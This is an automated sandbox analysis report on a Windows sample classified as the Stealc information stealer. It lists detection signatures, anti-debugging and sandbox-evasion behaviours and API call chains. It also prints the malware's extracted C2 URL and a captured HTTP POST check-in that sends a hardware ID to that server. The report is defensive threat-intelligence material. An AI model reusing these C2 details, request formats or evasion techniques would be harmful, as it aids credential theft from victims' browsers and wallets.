Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561397
MD5:69cbce48a9ce8b1da7a0195ae4dfbccc
SHA1:c05a7472201be886b55e2958351df9e211fbe639
SHA256:65e88eb9ca629cda57680a4f4f7d0d39fe7dfe7ef80d619b809779e9ecff33ad
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2508 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 69CBCE48A9CE8B1DA7A0195AE4DFBCCC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1501268976.000000000101E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1442560518.0000000004EC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 2508JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 2508JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T10:33:19.457814+010020442431Malware Command and Control Activity Detected192.168.2.849704185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206/c4becf79229cb002.php6EAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpBEAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.php/QAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpfEAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/VAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 00000000.00000002.1501268976.000000000101E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_004F4C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_004F60D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005140B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_005140B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00506960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00506960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_004FEA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00506B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00506B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_004F9B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F9B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_004F9B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_004F7750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005018A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005018A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00503910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00503910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00501250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00501250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00501269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00501269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0050E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00504B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00504B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00504B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00504B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0050CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00502390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00502390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004FDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004FDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005023A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_005023A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0050D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0050DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_004F16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_004F16B9

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49704 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFHCAKJDBKKEBFIIJJEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 42 33 30 46 46 38 44 34 43 42 45 32 30 39 39 39 32 35 32 38 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 2d 2d 0d 0a Data Ascii: ------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="hwid"9B30FF8D4CBE2099925286------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="build"mars------AKFHCAKJDBKKEBFIIJJE--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F6C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,0_2_004F6C40
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFHCAKJDBKKEBFIIJJEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 42 33 30 46 46 38 44 34 43 42 45 32 30 39 39 39 32 35 32 38 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 2d 2d 0d 0a Data Ascii: ------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="hwid"9B30FF8D4CBE2099925286------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="build"mars------AKFHCAKJDBKKEBFIIJJE--
              Source: file.exe, 00000000.00000002.1501268976.000000000101E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.1501268976.0000000001079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.1501268976.0000000001079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/V
              Source: file.exe, 00000000.00000002.1501268976.0000000001079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.1501268976.0000000001079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/Q
              Source: file.exe, 00000000.00000002.1501268976.0000000001064000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php6E
              Source: file.exe, 00000000.00000002.1501268976.0000000001064000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpBE
              Source: file.exe, 00000000.00000002.1501268976.0000000001064000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpfE
              Source: file.exe, 00000000.00000002.1501268976.0000000001079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/f
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_004F9770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EC8600_2_007EC860
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085A8590_2_0085A859
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005148B00_2_005148B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B48750_2_008B4875
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AC18D0_2_008AC18D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A71BB0_2_008A71BB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B39660_2_008B3966
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B325C0_2_007B325C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D0A280_2_007D0A28
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B620D0_2_008B620D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0076F2E90_2_0076F2E9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CA3770_2_007CA377
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A8BBF0_2_008A8BBF
